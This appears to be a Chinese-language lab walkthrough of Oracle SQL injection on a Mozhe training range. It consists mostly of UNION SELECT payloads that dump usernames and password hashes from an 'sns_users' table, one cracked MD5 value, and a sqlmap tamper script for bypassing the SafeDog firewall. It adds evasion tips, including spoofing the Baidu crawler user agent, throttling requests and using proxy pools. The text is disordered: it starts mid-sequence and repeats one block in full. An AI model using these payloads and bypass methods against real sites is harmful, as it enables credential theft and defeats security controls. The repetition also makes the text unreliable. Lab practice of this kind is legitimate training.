1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME<>'zhong' and USER_NAME<>'hu'
mozhe
0ca941b2a38e53adf2dd32fb7d8dffbf md5解密之后(229780)
得到真正的账号密码
Python脚本如下:
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Bypass SafeDog
"""
if '--' in payload:
payload = payload.split('--')[0]
return '/*!50001-- qwe/*%0a'+payload+'*/' if payload else payload
R_PWD
1 and 1=2 union select '1',column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name<>'USER_NAME' and column_name<>'USER_PWD'
STATUS
。。。。。
1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
最后这里需要加上" ",双引号,应该是Oracle数据库的规则。
得到账号密码
zhong
1c63129ae9asc60asdua94d3e00495
这里有一个坑就是,这个不是真的墨者账号密码,还需要继续查数据
1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME<>'zhong'
hu
1c63129ae9db9g20asdua94d3e00495
1 and 1=2 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME<>'zhong' and USER_NAME<>'hu'
mozhe
0ca941b2a38e53adf2dd32fb7d8dffbf md5解密之后(229780)
得到真正的账号密码
Python脚本如下:
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Bypass SafeDog
"""
if '--' in payload:
payload = payload.split('--')[0]
return '/*!50001-- qwe/*%0a'+payload+'*/' if payload else payload
有时候上面的脚本,写对了,但是真实绕过的时候,还是不能绕过。
主要原因还有很多,
一、安全狗对sqlmap的ua头进行拦截,解决方法,在sqlmap的时候,加上–random-agent,这时候再去用sqlmap的时候就是随机ua头,而不是sqlmap的头了
二、流量拦截,流量拦截就是访问过快,当访问过快被拦截之后,我们可以延时注入,直接加上参数就行–delay x ‘x’是延时的等级,或者更好的办法是利用各大搜索引擎的爬虫ua,当安全狗检测到我们的ua是搜索引擎的,会认为是搜索引擎在扫描,就不会拦截了。
1、爬虫
百度搜索引擎的爬虫
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2、代理池
3、中转注入
4、结合burp
python sqlmap.py -u "url" --proxy "http://127.0.0.1:8080"
这样,使用sqlmap的时候,sqlmap就会走burp代理,然后就可以学习别人的payload,或者说观察是哪里被拦截了,或者说对比一下正常的数据包哪里不一样,从而找出问题所在,然后编写对应的脚本进行绕过。